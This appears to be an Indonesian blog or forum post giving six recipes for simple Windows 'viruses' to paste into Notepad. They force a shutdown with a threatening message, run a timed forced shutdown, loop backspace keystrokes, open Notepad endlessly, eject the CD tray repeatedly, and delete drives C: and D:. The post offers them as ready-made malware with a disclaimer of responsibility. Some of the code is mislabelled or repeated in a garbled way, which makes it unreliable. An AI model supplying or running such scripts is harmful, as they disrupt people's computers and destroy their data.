1. Virus Untuk Membuat Komputer Shutdown
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo off
msg * I'AM WATCHING YOU!
shutdown -c "Error Your PC is Load,.,.," -s\
[+] Lalu Save As beri nama homo1.vbs dan jangan lupa pilih jenis File (All Files)msg * I'AM WATCHING YOU!
shutdown -c "Error Your PC is Load,.,.," -s\
2. Virus Untuk Membuat Komputer Shutdown Dengan Timer
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo shutdown -s -t 2 -f
[+] Angka 2 adalah timernya silahkan ganti sesuka lu bray[+] Lalu Save As beri nama homo2.vbs dan jangan lupa pilih jenis File (All Files)
3. Virus Untuk Membuat Tombol Backspace Menekan Terus-Menerus "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
MsgBox "Balik Lagi Bos!"Set wshShell =wscript.CreateObject("WScript.Shell")dowscript.sleep 100wshshell.sendkeys "{bs}"loop
[+] Lalu Save As beri nama homo3.vbs dan jangan lupa pilih jenis File (All Files)4. Virus Untuk Membuat Notepad Terbuka Secara Otomatis "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@ECHO off:topSTART %SystemRoot%\system32\notepad.exeGOTO top
[+] Lalu Save As beri nama homo4.vbs dan jangan lupa pilih jenis File (All Files)5. Virus Untuk Membuat DVD/CD ROOM terbuka sendiri "sudah saya coba"
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
[+] Lalu Save As beri nama homo5.vbs dan jangan lupa pilih jenis File (All Files)Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
6. Virus Untuk Memformat Hardisk
[+] Pertama buka notepad lalu masukan kode dibawah ke dalam notepad
@echo off
DEL C: -Y
DEL D: -Y
[+] Lalu Save As beri nama homo6.vbs dan jangan lupa pilih jenis File (All Files)DEL C: -Y
DEL D: -Y
[+] Resiko ditanggung pentester gue gak bertanggung jawab!